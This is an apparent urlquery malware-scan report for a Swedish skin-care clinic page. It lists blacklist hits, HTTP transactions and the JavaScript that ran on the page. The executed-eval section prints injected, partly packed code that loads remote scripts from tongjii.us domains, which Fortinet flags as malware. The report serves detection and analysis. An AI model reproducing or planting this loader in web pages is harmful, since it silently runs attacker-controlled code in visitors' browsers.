Overview

URL: hudterapeuter.com/hudterapeuter/ansiktsmassage/
IP: 195.74.38.68
ASN: AS41528 Binero AB
Location: Sweden
Report completed: 2017-07-22 11:38:33 CEST
urlquery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2017-07-22 11:38:02 CEST 1 Client IP  180.149.138.197 ET POLICY External IP Lookup sina.com.cn


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-07-22 2 www.hudterapeuter.com/jquery/javascript.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery/bgpos.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.fancybox/jquery.easing.1.3.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.fancybox/jquery.fancybox-1.2.1.js Malware
2017-07-22 2 www.hudterapeuter.com/jquery.js Malware
2017-07-22 2 lib.tongjii.us/tongji.js Malware
2017-07-22 2 cn.tongjii.us/show1.js?r2=22 Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/5PV_logo.gif/ Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/fasad1234.jpg/ Malware
2017-07-22 2 www.hudterapeuter.com/upl/small/5PV_logo.gif/ Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 195.74.38.68

Date UQ / IDS / BL URL IP
2019-04-30 09:05:10 +0200   0 - 0 - 0   espanet2019.se   195.74.38.68
2019-02-19 05:39:33 +0100   0 - 0 - 2   https://www.northmaint.se/   195.74.38.68
2018-12-27 15:10:08 +0100   0 - 0 - 1   whoisip.se/robots.txt   195.74.38.68
2018-11-25 21:10:19 +0100   0 - 0 - 1   medfors.com/dd   195.74.38.68
2018-11-06 14:05:16 +0100   2 - 0 - 2   whoisip.se   195.74.38.68
2018-11-06 13:56:12 +0100   2 - 0 - 2   whoisip.se   195.74.38.68
2018-11-06 13:55:20 +0100   2 - 0 - 2   whoisip.se   195.74.38.68
2018-01-19 15:07:50 +0100   2 - 0 - 2   www.whoisip.se/   195.74.38.68
2018-01-04 13:28:36 +0100   2 - 0 - 1   www.whoisip.se/   195.74.38.68
2017-12-19 12:16:09 +0100   2 - 0 - 1   www.klockan.info/   195.74.38.68

Last 10 reports on ASN: AS41528 Binero AB

Date UQ / IDS / BL URL IP
2019-06-27 09:11:33 +0200   0 - 0 - 0   www.tigercolor.com   195.74.38.98
2019-06-10 18:16:55 +0200   0 - 0 - 2   arnfast-kio-konsult.se/components/dhl.html   195.74.38.186
2019-06-10 15:33:46 +0200   0 - 0 - 1   kustkrogenolofsbo.se/wordpress/wp-content/plu (...)   195.74.38.121
2019-06-10 10:31:44 +0200   0 - 0 - 1   fifajournal.com/D1o40Dmemk   195.74.38.98
2019-06-10 07:08:17 +0200   0 - 0 - 1   solberga.org/tmp/install_4ee8d8cc51b82/media/ (...)   195.74.38.62
2019-06-10 07:06:02 +0200   0 - 0 - 1   solberga.org/tmp/install_4ee8d8cc51b82/media/ (...)   195.74.38.62
2019-06-09 13:34:54 +0200   0 - 0 - 30   ois.jenszackrisson.se/   195.74.38.176
2019-06-09 11:22:58 +0200   0 - 0 - 2   ostbergsmobelhus.com/wp-content/language   195.74.38.160
2019-06-09 11:16:26 +0200   0 - 0 - 1   https://www.ostbergsmobelhus.com/wp-content/l (...)   195.74.38.160
2019-06-09 09:09:41 +0200   0 - 0 - 2   svenskrisimport.com/index.php/riskakor   195.74.38.171

Last 1 reports on domain: .

Date UQ / IDS / BL URL IP
2017-06-30 17:13:37 +0200   0 - 1 - 2   hudterapeuter.com/malmo/vaxning   195.74.38.68


JavaScript

Executed Scripts (24)


Executed Evals (5)

#1 JavaScript::Eval (size: 588, repeated: 3) - SHA256: e131aa02b31d0b9e695259eeb2ab07bacead75544f5b5abd8886a84155a09441

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return c.toString(36)
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[c.toString(a)] = k[c] || c.toString(a)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('1 4=4||[];(b(){1 2=5.e(\'7\');2.a=\'8://9.d.f/k.6?//i.6?g\';1 3=5.j(\'7\')[0];3.h.c(2,3)})();', 21, 21, '|var|hm_en|s|_hmt_en|document|js|script|http|lib|src|function|insertBefore|tongjii|createElement|us|41d12a21b4e1a726d4a651685b118811662033874|parentNode|google|getElementsByTagName|tj'.split('|'), 0, {}))
                                    

#2 JavaScript::Eval (size: 996, repeated: 3) - SHA256: 00f7a0523e0b4239298a8f783fe9cf82af9fd8ecef28a73b423edae9140739f6

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}('v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\'\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\'\\\\w+\'};c=1};r(c--){q(k[c]){p=p.t(C D(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}m p}(\'1 4=4||[];(b(){1 2=5.e(\\\'7\\\');2.a=\\\'8://9.d.f/k.6?//i.6?g\\\';1 3=5.j(\\\'7\\\')[0];3.h.c(2,3)})();\',o,o,\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\'.J(\'|\'),0,{}))', 55, 55, '|||||||||||||||||||||function|return|toString|21||if|while||replace|hm_en|eval||document|var|36|js|String|new|RegExp|_hmt_en|parentNode|script|google|getElementsByTagName|split|tj|us|41d12a21b4e1a726d4a651685b118811662033874|lib|createElement|src|http|insertBefore|tongjii'.split('|'), 0, {}))
                                    

#3 JavaScript::Eval (size: 1377, repeated: 3) - SHA256: 2616199a56bdbaae4dc5e778d3a306cd6b7b415c02024e067265dc20257b1ac3

eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('7(x(e)=="A"||e==k||e==K){e=L;9 b=3.N(\'v\');7(b!=k&&b.c!=k){b.c=\'\';3.d.M(b)}9 z=Q.R.T();9 y=/W 6/.Y(z);7(!y){Z={$11:\'v\'};$J={};9 2=3.g(\'h\');2.c=\'i://O.P.12/2/w/1.8/w.U.2\';2.m(\'n\',\'f-8\');7(x B==\'A\'){(3.q("u")[0]||3.d).s(2);2.t=2.r=p(){7(2&&2.5&&2.5!="j"&&2.5!="o"){l}B.S();9 a=3.g(\'h\');a.c=\'i://I.C.D/E.2?X=\'+F G().H();a.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(a);a.t=a.r=p(){7(a&&a.5&&a.5!="j"&&a.5!="o"){l}}}}10{9 4=3.g(\'h\');4.c=\'i://I.C.D/E.2?V=\'+F G().H();4.m(\'n\',\'f-8\');(3.q("u")[0]||3.d).s(4);4.t=4.r=p(){7(4&&4.5&&4.5!="j"&&4.5!="o"){l}}}}}', 62, 65, '||js|document|js_b|readyState||if||var||seed|src|body|sbj_new_loading|utf|createElement|script|http|loaded|null|return|setAttribute|charset|complete|function|getElementsByTagName|onreadystatechange|appendChild|onload|head|tongjiTool|jquery|typeof|isIE6|_ua|undefined|jQuery|tongjii|us|show1|new|Date|getDate|cn|_GLOBAL|false|true|removeChild|getElementById|lib|sinaapp|navigator|userAgent|noConflict|toLowerCase|min|r2|msie|r1|test|scope|else|pageid|com'.split('|'), 0, {}))
                                    

#4 JavaScript::Eval (size: 1434, repeated: 3) - SHA256: 5c3ec5fa684c7b643270645fc63e13323804eec6f86378f40d1de02a892ac6bd

if (typeof(sbj_new_loading) == "undefined" || sbj_new_loading == null || sbj_new_loading == false) {
    sbj_new_loading = true;
    var seed = document.getElementById('tongjiTool');
    if (seed != null && seed.src != null) {
        seed.src = '';
        document.body.removeChild(seed)
    }
    var _ua = navigator.userAgent.toLowerCase();
    var isIE6 = /msie 6/.test(_ua);
    if (!isIE6) {
        scope = {
            $pageid: 'tongjiTool'
        };
        $_GLOBAL = {};
        var js = document.createElement('script');
        js.src = 'http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js';
        js.setAttribute('charset', 'utf-8');
        if (typeof jQuery == 'undefined') {
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js);
            js.onload = js.onreadystatechange = function() {
                if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
                    return
                }
                jQuery.noConflict();
                var a = document.createElement('script');
                a.src = 'http://cn.tongjii.us/show1.js?r1=' + new Date().getDate();
                a.setAttribute('charset', 'utf-8');
                (document.getElementsByTagName("head")[0] || document.body).appendChild(a);
                a.onload = a.onreadystatechange = function() {
                    if (a && a.readyState && a.readyState != "loaded" && a.readyState != "complete") {
                        return
                    }
                }
            }
        } else {
            var js_b = document.createElement('script');
            js_b.src = 'http://cn.tongjii.us/show1.js?r2=' + new Date().getDate();
            js_b.setAttribute('charset', 'utf-8');
            (document.getElementsByTagName("head")[0] || document.body).appendChild(js_b);
            js_b.onload = js_b.onreadystatechange = function() {
                if (js_b && js_b.readyState && js_b.readyState != "loaded" && js_b.readyState != "complete") {
                    return
                }
            }
        }
    }
}
                                    

#5 JavaScript::Eval (size: 261, repeated: 3) - SHA256: c3c91594491914f1aa57cb7a7342d87694cd45319576b7de0074b22ab82ab51e

var _hmt_en = _hmt_en || [];
(function() {
    var hm_en = document.createElement('script');
    hm_en.src = 'http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(hm_en, s)
})();
                                    

Executed Writes (4)

#1 JavaScript::Write (size: 222, repeated: 2) - SHA256: 50d23449657707d3106fd7fc1055ef0df5ec72801ee5ad399f484a1f2ef5df55

<a href="http://clk.tradedoubler.com/click?p=70363&a=1978982&g=17342348&pools=450314" target="_blank"><img border="0" src="http://www.gymgrossisten.com/bilder/gymgrossisten/TD/bs_140x350.gif" title="Bodystore&#46;com"></a>

#2 JavaScript::Write (size: 84, repeated: 1) - SHA256: 071bb71cc5f59a8a7b8eeb83d3b40bdfebdb2381c15bfb06526d6bc7b795dd25

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#3 JavaScript::Write (size: 141, repeated: 1) - SHA256: 5904229be827c99db72258f5b93a5c489e9a2b6dba350c655559f25f91237783

<script type="text/javascript" src="http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)010162219" charset="ISO-8859-1"></script>

#4 JavaScript::Write (size: 141, repeated: 1) - SHA256: aef3b3fc432214cb2c8223b7ea7698405beaa586162e20a59c47cbe4514856ac

<script type="text/javascript" src="http://impse.tradedoubler.com/imp?type(js)pool(450314)a(1978982)695183832" charset="ISO-8859-1"></script>


HTTP Transactions (35)


Request Response
                                        
Request:
GET /jquery/javascript.js HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad287-18e-4fe4f0b4e5c47"
Accept-Ranges: bytes
Content-Length: 398
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3890351dc9f882025e2c8b2fcb55fec0
Sha1:   042f761101a7c99ccef3b8157738e1814db3036e
Sha256: 2be006305b1138ecda96b612633cc2c372edf3dd6d25185e31d488f041ca7b39

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /jquery/bgpos.js HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:52 GMT
Etag: "43ad286-4c2-4fe4f0b4d2b6c"
Accept-Ranges: bytes
Content-Length: 1218
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   1218
Md5:    c8df8821a7e0302ae8c9422365eb4237
Sha1:   a6c0364e106bc703aa42dce62cb2b5a7e323058f
Sha256: b7daed3cbf5bdeb9843317c797cbad5abfed769e8c1052a9eff6f5e3fbef0e21

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 82.99.30.73:
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:37:57 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:37:56 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
Request:
GET /jquery.fancybox/jquery.easing.1.3.js HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e53-2583-5161df9062e81"
Accept-Ranges: bytes
Content-Length: 9603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   9603
Md5:    fb323c2a880c896cfb5ebb97201f56ef
Sha1:   087990c77361bf282a986ce36f4b7e5cedf60223
Sha256: 2a8d2ecc528fd17f0650116705a34f66748859ab7c4ed407b759371f3dcd7bb5

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /styles.css HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:35 GMT
Etag: "4787354-296b-4fe4f032747eb"
Accept-Ranges: bytes
Content-Length: 10603
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode C program text
Size:   10603
Md5:    5ded803ca90a08123c1ced2866e86ee2
Sha1:   74dcb7b85a5188b84ca70884ebb4b7eddfbdcce5
Sha256: 8a48bad8902f11fc9968003334f639b75dceba9ddd5447cc5dd619e8d279fc96
                                        
Request:
GET /jquery.fancybox/jquery.fancybox.css HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:53:37 GMT
Etag: "44b8e56-12e0-4fe4f03415410"
Accept-Ranges: bytes
Content-Length: 4832
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII text
Size:   4832
Md5:    b140fcaab5aec61d0b382e1d05c663fd
Sha1:   43d0633e7e0c8f65b24d12af188990d1303a8047
Sha256: da2eb39547d9b060599f8f20430c9e27fa1150dea042c0008fd96ac3854cc8be
                                        
Request:
GET /jquery.fancybox/jquery.fancybox-1.2.1.js HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "44b8e54-3fc0-5161df90645e3"
Accept-Ranges: bytes
Content-Length: 16320
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   16320
Md5:    b77b3d074cbe4048495a2ad91b939fea
Sha1:   eca6c7751f7d375a31ce4a5ef9f69a19e1eb197b
Sha256: 564ee795773003273c505f0eed7183ab4ddad4c54cd930770cf8b19c8bfab126

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /img/logo_s.png HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: image/png
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:49 GMT
Etag: "457431b-32b0-4fe4f0b1fe58b"
Accept-Ranges: bytes
Content-Length: 12976
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  PNG image, 348 x 51, 8-bit/color RGBA, non-interlaced
Size:   12976
Md5:    e3f2b0d54c05a86e5162bc20acd1c509
Sha1:   b0c8108c2722d71a903b0a5a7fe6c9cfbee26300
Sha256: 2967aa5eddebb376c9b1fc35c81efbd3647ef6e227fcbe4aed1a8b77d63dea56
                                        
Request:
GET /jquery.js HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
Last-Modified: Fri, 15 May 2015 12:27:51 GMT
Etag: "42f1bba-ddcc-5161df9070d0d"
Accept-Ranges: bytes
Content-Length: 56780
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  ASCII C program text, with very long lines, with CRLF, LF line terminators
Size:   56780
Md5:    1744208268fa90854b7caf3ff2f97283
Sha1:   bdf1fb9d5e59fce38344d8583eb4854ed4944710
Sha256: 56fa09c4c7f114de833fc930b5e58872f24f0812cb68bed093ade296ea78a19e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1
Host: lib.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 103.230.122.162:
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Server: nginx
Date: Sat, 22 Jul 2017 09:35:42 GMT
Content-Length: 584
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   584
Md5:    e3234a0a314ab9037281a61532d9f385
Sha1:   da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb
Sha256: 59ec2b49759dd09f18e6a99dd9424f56223bef43b624f37979e02bd21c976722
                                        
Request:
GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

                                         
Response from 82.99.30.73:
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:37:58 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:37:58 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
Request:
GET /tongji.js HTTP/1.1
Host: lib.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 103.230.122.162:
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Server: nginx
Date: Sat, 22 Jul 2017 09:35:43 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"596f39f9-803"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1145
Md5:    c4ad0d579602dfcb81e42018f2f7ca90
Sha1:   c778b8ce60d843fcaa8b943681af9cb28f87c53e
Sha256: 481eff6a5f51981e6f947ae316365d1d542478843d353f7afcbbbfff675e3a24

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /hudterapeuter/ansiktsmassage/ HTTP/1.1
Host: hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 22 Jul 2017 09:37:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; path=/
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text, with very long lines, with CRLF, LF line terminators
Size:   45877
Md5:    3d98a20c2327bed3eec27f6c517d3cc4
Sha1:   ddc63f3021c715b3d8ee9b0cafb12bb824f0ecf8
Sha256: 08f93194b9aa104785516f09bd93a436868b10018dd2f5aac4357237141f4aed
                                        
Request:
GET /show1.js?r2=22 HTTP/1.1
Host: cn.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 106.184.4.142:
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Server: nginx
Date: Sat, 22 Jul 2017 09:37:59 GMT
Last-Modified: Tue, 04 Jul 2017 01:02:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"595ae924-3bee"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4331
Md5:    55f514a8d510b1a8096fdfc98d0d1446
Sha1:   01ce4f0a37948265a8aaf51277b115d6cb3c9530
Sha256: c054cda60fb3050396d0826493e3fc691ad464ca7b718e7d63ea62cf9469c210

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /upl/small/5PV_logo.gif/ HTTP/1.1
Host: www.hudterapeuter.com
